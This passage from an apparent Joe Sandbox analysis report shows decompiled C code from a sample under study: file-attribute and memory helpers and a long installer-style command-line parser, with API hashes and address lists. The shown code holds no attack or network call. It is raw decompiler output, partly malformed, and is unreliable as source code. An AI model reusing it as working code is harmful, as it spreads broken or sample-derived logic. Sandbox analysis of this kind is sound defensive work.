                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2591292051-0
                                                                                                                                                                                                                                            • Opcode ID: 281b97fca9a4ac510b6e029015833504f3ba8f3d92a2f43ecc44374d8604a49b
                                                                                                                                                                                                                                            • Instruction ID: b488bdad4e9e0610492c7c9863e20f2609a33241219414fb315812dc59dc1aa5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 281b97fca9a4ac510b6e029015833504f3ba8f3d92a2f43ecc44374d8604a49b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 48F01231941B289E47739F39EC10652BBE8AB95361310492EA4AED2190DB30A44ACB90
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E003266AE(CHAR* __ecx) {
                                                                                                                                                                                                                                            				unsigned int _t1;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                                                            				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                                                            					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(?,00324777,?,00324E38,?), ref: 003266B1
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                                            • Opcode ID: e32c9073f4f60ba477ff6db7ee0216d7a8dd9fa3e0cbf941a273eaa58e78392a
                                                                                                                                                                                                                                            • Instruction ID: 5988ad0e127315b7cd5caf1f46805b2109cd32126b62960105bad860aebec5d8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e32c9073f4f60ba477ff6db7ee0216d7a8dd9fa3e0cbf941a273eaa58e78392a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DCB09276222850476A2206317C2A95A2845ABC133ABE55B98F032D01E0CA3EC846D004
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00324CA0(long _a4) {
                                                                                                                                                                                                                                            				void* _t2;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                                                            				return _t2;
                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GlobalAlloc.KERNELBASE(00000000,?), ref: 00324CAA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AllocGlobal
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3761449716-0
                                                                                                                                                                                                                                            • Opcode ID: 13c64b4ccbc97ef0fc5ae0977af05fde7be9beaf2eea03fe3dceb042e61b912a
                                                                                                                                                                                                                                            • Instruction ID: b5fbcfca56fc6b710200df249e4db6caf38cc0c4a632a8de7ba3c4ef120a9d67
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 13c64b4ccbc97ef0fc5ae0977af05fde7be9beaf2eea03fe3dceb042e61b912a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 22B0123204420CBBCF111FC2FC09F853F1DE7C4761F144000F60C450508A7294118696
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00324CC0(void* _a4) {
                                                                                                                                                                                                                                            				void* _t2;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                                                            				return _t2;
                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FreeGlobal
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2979337801-0
                                                                                                                                                                                                                                            • Opcode ID: 41cc91dc35d877aa23598ea347af96abdc98804315c248b20d425d3d08cd82be
                                                                                                                                                                                                                                            • Instruction ID: 15c82930515a71d7fe90c0546f67ee116349dd0cc9e2046dc235919d12003a67
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 41cc91dc35d877aa23598ea347af96abdc98804315c248b20d425d3d08cd82be
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 78B0123100010CBB8F111B42FC088453F1DD7C0360B004010F50C410218B3398128585
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                                            			E00325C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                            				CHAR* _v265;
                                                                                                                                                                                                                                            				char _v266;
                                                                                                                                                                                                                                            				char _v267;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				CHAR* _v272;
                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                            				signed int _v296;
                                                                                                                                                                                                                                            				char _v556;
                                                                                                                                                                                                                                            				signed int _t61;
                                                                                                                                                                                                                                            				int _t63;
                                                                                                                                                                                                                                            				char _t67;
                                                                                                                                                                                                                                            				CHAR* _t69;
                                                                                                                                                                                                                                            				signed int _t71;
                                                                                                                                                                                                                                            				void* _t75;
                                                                                                                                                                                                                                            				char _t79;
                                                                                                                                                                                                                                            				void* _t83;
                                                                                                                                                                                                                                            				void* _t85;
                                                                                                                                                                                                                                            				void* _t87;
                                                                                                                                                                                                                                            				intOrPtr _t88;
                                                                                                                                                                                                                                            				void* _t100;
                                                                                                                                                                                                                                            				intOrPtr _t101;
                                                                                                                                                                                                                                            				CHAR* _t104;
                                                                                                                                                                                                                                            				intOrPtr _t105;
                                                                                                                                                                                                                                            				void* _t111;
                                                                                                                                                                                                                                            				void* _t115;
                                                                                                                                                                                                                                            				CHAR* _t118;
                                                                                                                                                                                                                                            				void* _t119;
                                                                                                                                                                                                                                            				void* _t127;
                                                                                                                                                                                                                                            				CHAR* _t129;
                                                                                                                                                                                                                                            				void* _t132;
                                                                                                                                                                                                                                            				void* _t142;
                                                                                                                                                                                                                                            				signed int _t143;
                                                                                                                                                                                                                                            				CHAR* _t144;
                                                                                                                                                                                                                                            				void* _t145;
                                                                                                                                                                                                                                            				void* _t146;
                                                                                                                                                                                                                                            				void* _t147;
                                                                                                                                                                                                                                            				void* _t149;
                                                                                                                                                                                                                                            				char _t155;
                                                                                                                                                                                                                                            				void* _t157;
                                                                                                                                                                                                                                            				void* _t162;
                                                                                                                                                                                                                                            				void* _t163;
                                                                                                                                                                                                                                            				char _t167;
                                                                                                                                                                                                                                            				char _t170;
                                                                                                                                                                                                                                            				CHAR* _t173;
                                                                                                                                                                                                                                            				void* _t177;
                                                                                                                                                                                                                                            				intOrPtr* _t183;
                                                                                                                                                                                                                                            				intOrPtr* _t192;
                                                                                                                                                                                                                                            				CHAR* _t199;
                                                                                                                                                                                                                                            				void* _t200;
                                                                                                                                                                                                                                            				CHAR* _t201;
                                                                                                                                                                                                                                            				void* _t205;
                                                                                                                                                                                                                                            				void* _t206;
                                                                                                                                                                                                                                            				int _t209;
                                                                                                                                                                                                                                            				void* _t210;
                                                                                                                                                                                                                                            				void* _t212;
                                                                                                                                                                                                                                            				void* _t213;
                                                                                                                                                                                                                                            				CHAR* _t218;
                                                                                                                                                                                                                                            				intOrPtr* _t219;
                                                                                                                                                                                                                                            				intOrPtr* _t220;
                                                                                                                                                                                                                                            				signed int _t221;
                                                                                                                                                                                                                                            				signed int _t223;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t173 = __ecx;
                                                                                                                                                                                                                                            				_t61 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t61 ^ _t221;
                                                                                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                                            				_push(__edi);
                                                                                                                                                                                                                                            				_t209 = 1;
                                                                                                                                                                                                                                            				if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                                                                                                                            					_t63 = 1;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                                            					while(_t209 != 0) {
_t67 =  *_t173;
if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
	_t173 = CharNextA(_t173);
	continue;
}
_v272 = _t173;
if(_t67 == 0) {
	break;
} else {
	_t69 = _v272;
	_t177 = 0;
	_t213 = 0;
	_t163 = 0;
	_t202 = 1;
	do {
		if(_t213 != 0) {
			if(_t163 != 0) {
				break;
			} else {
				goto L21;
			}
		} else {
			_t69 =  *_t69;
			if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
				break;
			} else {
				_t69 = _v272;
				L21:
				_t155 =  *_t69;
				if(_t155 != 0x22) {
					if(_t202 >= 0x104) {
						goto L106;
					} else {
						 *((char*)(_t221 + _t177 - 0x108)) = _t155;
						_t177 = _t177 + 1;
						_t202 = _t202 + 1;
						_t157 = 1;
						goto L30;
					}
				} else {
					if(_v272[1] == 0x22) {
						if(_t202 >= 0x104) {
							L106:
							_t63 = 0;
							L125:
							_pop(_t210);
							_pop(_t212);
							_pop(_t162);
							return E00326CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
						} else {
							 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
							_t177 = _t177 + 1;
							_t202 = _t202 + 1;
							_t157 = 2;
							goto L30;
						}
					} else {
						_t157 = 1;
						if(_t213 != 0) {
							_t163 = 1;
						} else {
							_t213 = 1;
						}
						goto L30;
					}
				}
			}
		}
		goto L131;
		L30:
		_v272 =  &(_v272[_t157]);
		_t69 = _v272;
	} while ( *_t69 != 0);
	if(_t177 >= 0x104) {
		E00326E2A(_t69, _t163, _t177, _t202, _t209, _t213);
		asm("int3");
		_push(_t221);
		_t222 = _t223;
		_t71 =  *0x328004; // 0x2c4b51c8
		_v296 = _t71 ^ _t223;
		if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
			0x4f0 = 2;
			_t75 = E0032597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
		} else {
			E003244B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
			 *0x329124 = E00326285();
			_t75 = 0;
		}
		return E00326CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
	} else {
		 *((char*)(_t221 + _t177 - 0x108)) = 0;
		if(_t213 == 0) {
			if(_t163 != 0) {
				goto L34;
			} else {
				goto L40;
			}
		} else {
			if(_t163 != 0) {
				L40:
				_t79 = _v268;
				if(_t79 == 0x2f || _t79 == 0x2d) {
					_t83 = CharUpperA(_v267) - 0x3f;
					if(_t83 == 0) {
						_t202 = 0x521;
						E003244B9(0, 0x521, 0x321140, 0, 0x40, 0);
						_t85 =  *0x328588; // 0x0
						if(_t85 != 0) {
							CloseHandle(_t85);
						}
						ExitProcess(0);
					}
					_t87 = _t83 - 4;
					if(_t87 == 0) {
						if(_v266 != 0) {
							if(_v266 != 0x3a) {
								goto L49;
							} else {
								_t167 = (0 | _v265 == 0x00000022) + 3;
								_t215 =  &_v268 + _t167;
								_t183 =  &_v268 + _t167;
								_t50 = _t183 + 1; // 0x1
								_t202 = _t50;
								do {
									_t88 =  *_t183;
									_t183 = _t183 + 1;
								} while (_t88 != 0);
								if(_t183 == _t202) {
									goto L49;
								} else {
									_t205 = 0x5b;
									if(E0032667F(_t215, _t205) == 0) {
										L115:
										_t206 = 0x5d;
										if(E0032667F(_t215, _t206) == 0) {
											L117:
											_t202 =  &_v276;
											_v276 = _t167;
                                                                                                                                                                                                                                            																	if(E00325C17(_t215,  &_v276) == 0) {
                                                                                                                                                                                                                                            																		goto L49;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		_t202 = 0x104;
                                                                                                                                                                                                                                            																		E00321680(0x328c42, 0x104, _v276 + _t167 +  &_v268);
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	_t202 = 0x5b;
                                                                                                                                                                                                                                            																	if(E0032667F(_t215, _t202) == 0) {
                                                                                                                                                                                                                                            																		goto L49;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		goto L117;
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																_t202 = 0x5d;
                                                                                                                                                                                                                                            																if(E0032667F(_t215, _t202) == 0) {
                                                                                                                                                                                                                                            																	goto L49;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	goto L115;
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													 *0x328a24 = 1;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												goto L50;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t100 = _t87 - 1;
                                                                                                                                                                                                                                            												if(_t100 == 0) {
                                                                                                                                                                                                                                            													L98:
                                                                                                                                                                                                                                            													if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            														goto L49;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                                                            														_t217 =  &_v268 + _t170;
                                                                                                                                                                                                                                            														_t192 =  &_v268 + _t170;
                                                                                                                                                                                                                                            														_t38 = _t192 + 1; // 0x1
                                                                                                                                                                                                                                            														_t202 = _t38;
                                                                                                                                                                                                                                            														do {
                                                                                                                                                                                                                                            															_t101 =  *_t192;
                                                                                                                                                                                                                                            															_t192 = _t192 + 1;
                                                                                                                                                                                                                                            														} while (_t101 != 0);
                                                                                                                                                                                                                                            														if(_t192 == _t202) {
                                                                                                                                                                                                                                            															goto L49;
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															_t202 =  &_v276;
                                                                                                                                                                                                                                            															_v276 = _t170;
                                                                                                                                                                                                                                            															if(E00325C17(_t217,  &_v276) == 0) {
                                                                                                                                                                                                                                            																goto L49;
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																_t104 = CharUpperA(_v267);
                                                                                                                                                                                                                                            																_t218 = 0x328b3e;
                                                                                                                                                                                                                                            																_t105 = _v276;
                                                                                                                                                                                                                                            																if(_t104 != 0x54) {
                                                                                                                                                                                                                                            																	_t218 = 0x328a3a;
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            																E00321680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                                                                                                                                                                                            																_t202 = 0x104;
                                                                                                                                                                                                                                            																E0032658A(_t218, 0x104, 0x321140);
                                                                                                                                                                                                                                            																if(E003231E0(_t218) != 0) {
                                                                                                                                                                                                                                            																	goto L50;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	goto L106;
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													_t111 = _t100 - 0xa;
                                                                                                                                                                                                                                            													if(_t111 == 0) {
                                                                                                                                                                                                                                            														if(_v266 != 0) {
                                                                                                                                                                                                                                            															if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            																goto L49;
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																_t199 = _v265;
                                                                                                                                                                                                                                            																if(_t199 != 0) {
                                                                                                                                                                                                                                            																	_t219 =  &_v265;
                                                                                                                                                                                                                                            																	do {
                                                                                                                                                                                                                                            																		_t219 = _t219 + 1;
                                                                                                                                                                                                                                            																		_t115 = CharUpperA(_t199) - 0x45;
                                                                                                                                                                                                                                            																		if(_t115 == 0) {
                                                                                                                                                                                                                                            																			 *0x328a2c = 1;
                                                                                                                                                                                                                                            																		} else {
                                                                                                                                                                                                                                            																			_t200 = 2;
                                                                                                                                                                                                                                            																			_t119 = _t115 - _t200;
                                                                                                                                                                                                                                            																			if(_t119 == 0) {
                                                                                                                                                                                                                                            																				 *0x328a30 = 1;
                                                                                                                                                                                                                                            																			} else {
                                                                                                                                                                                                                                            																				if(_t119 == 0xf) {
                                                                                                                                                                                                                                            																					 *0x328a34 = 1;
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t209 = 0;
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																			}
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																		_t118 =  *_t219;
                                                                                                                                                                                                                                            																		_t199 = _t118;
                                                                                                                                                                                                                                            																	} while (_t118 != 0);
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															 *0x328a2c = 1;
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            														goto L50;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														_t127 = _t111 - 3;
                                                                                                                                                                                                                                            														if(_t127 == 0) {
                                                                                                                                                                                                                                            															if(_v266 != 0) {
                                                                                                                                                                                                                                            																if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            																	goto L49;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	_t129 = CharUpperA(_v265);
                                                                                                                                                                                                                                            																	if(_t129 == 0x31) {
                                                                                                                                                                                                                                            																		goto L76;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		if(_t129 == 0x41) {
                                                                                                                                                                                                                                            																			goto L83;
                                                                                                                                                                                                                                            																		} else {
                                                                                                                                                                                                                                            																			if(_t129 == 0x55) {
                                                                                                                                                                                                                                            																				goto L76;
                                                                                                                                                                                                                                            																			} else {
                                                                                                                                                                                                                                            																				goto L49;
                                                                                                                                                                                                                                            																			}
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																L76:
                                                                                                                                                                                                                                            																_push(2);
                                                                                                                                                                                                                                            																_pop(1);
                                                                                                                                                                                                                                            																L83:
                                                                                                                                                                                                                                            																 *0x328a38 = 1;
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            															goto L50;
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															_t132 = _t127 - 1;
                                                                                                                                                                                                                                            															if(_t132 == 0) {
                                                                                                                                                                                                                                            																if(_v266 != 0) {
                                                                                                                                                                                                                                            																	if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                                                                                                                                                                                            																			goto L49;
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		_t201 = _v265;
                                                                                                                                                                                                                                            																		 *0x329a2c = 1;
                                                                                                                                                                                                                                            																		if(_t201 != 0) {
                                                                                                                                                                                                                                            																			_t220 =  &_v265;
                                                                                                                                                                                                                                            																			do {
                                                                                                                                                                                                                                            																				_t220 = _t220 + 1;
                                                                                                                                                                                                                                            																				_t142 = CharUpperA(_t201) - 0x41;
                                                                                                                                                                                                                                            																				if(_t142 == 0) {
                                                                                                                                                                                                                                            																					_t143 = 2;
                                                                                                                                                                                                                                            																					 *0x329a2c =  *0x329a2c | _t143;
                                                                                                                                                                                                                                            																					goto L70;
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t145 = _t142 - 3;
                                                                                                                                                                                                                                            																					if(_t145 == 0) {
                                                                                                                                                                                                                                            																						 *0x328d48 =  *0x328d48 | 0x00000040;
                                                                                                                                                                                                                                            																					} else {
                                                                                                                                                                                                                                            																						_t146 = _t145 - 5;
                                                                                                                                                                                                                                            																						if(_t146 == 0) {
                                                                                                                                                                                                                                            																							 *0x329a2c =  *0x329a2c & 0xfffffffd;
                                                                                                                                                                                                                                            																							goto L70;
                                                                                                                                                                                                                                            																						} else {
                                                                                                                                                                                                                                            																							_t147 = _t146 - 5;
                                                                                                                                                                                                                                            																							if(_t147 == 0) {
                                                                                                                                                                                                                                            																								 *0x329a2c =  *0x329a2c & 0xfffffffe;
                                                                                                                                                                                                                                            																								goto L70;
                                                                                                                                                                                                                                            																							} else {
                                                                                                                                                                                                                                            																								_t149 = _t147;
                                                                                                                                                                                                                                            																								if(_t149 == 0) {
                                                                                                                                                                                                                                            																									 *0x328d48 =  *0x328d48 | 0x00000080;
                                                                                                                                                                                                                                            																								} else {
                                                                                                                                                                                                                                            																									if(_t149 == 3) {
                                                                                                                                                                                                                                            																										 *0x329a2c =  *0x329a2c | 0x00000004;
                                                                                                                                                                                                                                            																										L70:
                                                                                                                                                                                                                                            																										 *0x328a28 = 1;
                                                                                                                                                                                                                                            																									} else {
                                                                                                                                                                                                                                            																										_t209 = 0;
                                                                                                                                                                                                                                            																									}
                                                                                                                                                                                                                                            																								}
                                                                                                                                                                                                                                            																							}
                                                                                                                                                                                                                                            																						}
                                                                                                                                                                                                                                            																					}
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																				_t144 =  *_t220;
                                                                                                                                                                                                                                            																				_t201 = _t144;
                                                                                                                                                                                                                                            																			} while (_t144 != 0);
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	 *0x329a2c = 3;
                                                                                                                                                                                                                                            																	 *0x328a28 = 1;
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            																goto L50;
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																if(_t132 == 0) {
                                                                                                                                                                                                                                            																	goto L98;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	L49:
                                                                                                                                                                                                                                            																	_t209 = 0;
                                                                                                                                                                                                                                            																	L50:
                                                                                                                                                                                                                                            																	_t173 = _v272;
                                                                                                                                                                                                                                            																	if( *_t173 != 0) {
                                                                                                                                                                                                                                            																		goto L2;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		break;
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L106;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										L34:
                                                                                                                                                                                                                                            										_t209 = 0;
                                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L131;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if( *0x328a2c != 0 &&  *0x328b3e == 0) {
                                                                                                                                                                                                                                            						if(GetModuleFileNameA( *0x329a3c, 0x328b3e, 0x104) == 0) {
                                                                                                                                                                                                                                            							_t209 = 0;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t202 = 0x5c;
                                                                                                                                                                                                                                            							 *((char*)(E003266C8(0x328b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t63 = _t209;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				L131:
                                                                                                                                                                                                                                            			}
                                                                                                                                                                                                                                            0x0032613c
                                                                                                                                                                                                                                            0x0032613e
                                                                                                                                                                                                                                            0x0032613e
                                                                                                                                                                                                                                            0x00326141
                                                                                                                                                                                                                                            0x00326141
                                                                                                                                                                                                                                            0x00326143
                                                                                                                                                                                                                                            0x00326144
                                                                                                                                                                                                                                            0x0032614a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00326150
                                                                                                                                                                                                                                            0x00326152
                                                                                                                                                                                                                                            0x0032615c
                                                                                                                                                                                                                                            0x00326170
                                                                                                                                                                                                                                            0x00326172
                                                                                                                                                                                                                                            0x0032617c
                                                                                                                                                                                                                                            0x00326190
                                                                                                                                                                                                                                            0x00326190
                                                                                                                                                                                                                                            0x00326196
                                                                                                                                                                                                                                            0x003261a5
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003261ab
                                                                                                                                                                                                                                            0x003261b9
                                                                                                                                                                                                                                            0x003261c6
                                                                                                                                                                                                                                            0x003261c6
                                                                                                                                                                                                                                            0x0032617e
                                                                                                                                                                                                                                            0x00326180
                                                                                                                                                                                                                                            0x0032618a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032618a
                                                                                                                                                                                                                                            0x0032615e
                                                                                                                                                                                                                                            0x00326160
                                                                                                                                                                                                                                            0x0032616a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032616a
                                                                                                                                                                                                                                            0x0032615c
                                                                                                                                                                                                                                            0x0032614a
                                                                                                                                                                                                                                            0x0032610b
                                                                                                                                                                                                                                            0x0032610e
                                                                                                                                                                                                                                            0x0032610e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325e59
                                                                                                                                                                                                                                            0x00325e59
                                                                                                                                                                                                                                            0x00325e5c
                                                                                                                                                                                                                                            0x0032604f
                                                                                                                                                                                                                                            0x00326056
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032605c
                                                                                                                                                                                                                                            0x0032606e
                                                                                                                                                                                                                                            0x00326071
                                                                                                                                                                                                                                            0x00326073
                                                                                                                                                                                                                                            0x00326075
                                                                                                                                                                                                                                            0x00326075
                                                                                                                                                                                                                                            0x00326078
                                                                                                                                                                                                                                            0x00326078
                                                                                                                                                                                                                                            0x0032607a
                                                                                                                                                                                                                                            0x0032607b
